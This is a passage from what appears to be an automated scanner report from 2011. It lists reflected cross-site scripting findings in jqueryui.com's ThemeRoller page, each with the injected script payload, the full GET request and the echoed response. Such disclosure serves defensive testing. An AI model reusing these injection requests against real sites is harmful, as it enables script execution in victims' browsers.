/* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120320

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%16685"><script>alert(1)</script>dd0f9a34ef1&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent
...[SNIP]...

3.57. http://jqueryui.com/themeroller/ [fwDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f96a1"><script>alert(1)</script>5f3ea89b3c1 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=boldf96a1"><script>alert(1)</script>5f3ea89b3c1&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120257

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=boldf96a1"><script>alert(1)</script>5f3ea89b3c1&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&b
...[SNIP]...

3.58. http://jqueryui.com/themeroller/ [iconColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9339"><script>alert(1)</script>0658b12cb0b was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CCd9339"><script>alert(1)</script>0658b12cb0b&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CCd9339"><script>alert(1)</script>0658b12cb0b&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01
...[SNIP]...

3.59. http://jqueryui.com/themeroller/ [iconColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48a1c"><script>alert(1)</script>c4245844e06 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=66666648a1c"><script>alert(1)</script>c4245844e06&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
erColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=66666648a1c"><script>alert(1)</script>c4245844e06&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_s
...[SNIP]...

3.60. http://jqueryui.com/themeroller/ [iconColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2216b"><script>alert(1)</script>cae83cdb21e was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF2216b"><script>alert(1)</script>cae83cdb21e&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
nt=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF2216b"><script>alert(1)</script>cae83cdb21e&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgO
...[SNIP]...

3.61. http://jqueryui.com/themeroller/ [iconColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa094"><script>alert(1)</script>fb9a666b652 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000fa094"><script>alert(1)</script>fb9a666b652&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000fa094"><script>alert(1)</script>fb9a666b652&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px
...[SNIP]...

3.62. http://jqueryui.com/themeroller/ [iconColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2df0"><script>alert(1)</script>9d2ae49d906 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFFa2df0"><script>alert(1)</script>9d2ae49d906&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFFa2df0"><script>alert(1)</script>9d2ae49d906&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.p
...[SNIP]...

3.63. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa12d"><script>alert(1)</script>5d0fca062f4 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000aa12d"><script>alert(1)</script>5d0fca062f4&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000aa12d"><script>alert(1)</script>5d0fca062f4&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay
...[SNIP]...

3.64. http://jqueryui.com/themeroller/ [iconColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df741"><script>alert(1)</script>1018a4cb3c8 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFFdf741"><script>alert(1)</script>1018a4cb3c8&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
erColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFFdf741"><script>alert(1)</script>1018a4cb3c8&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_so
...[SNIP]...

3.65. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 795c1"><script>alert(1)</script>41c916c7e5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?795c1"><script>alert(1)</script>41c916c7e5d=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&795c1"><script>alert(1)</script>41c916c7e5d=1" type="text/css" media="all" />
...[SNIP]...

3.66. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3efe"><script>alert(1)</script>2f5dc1da704 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

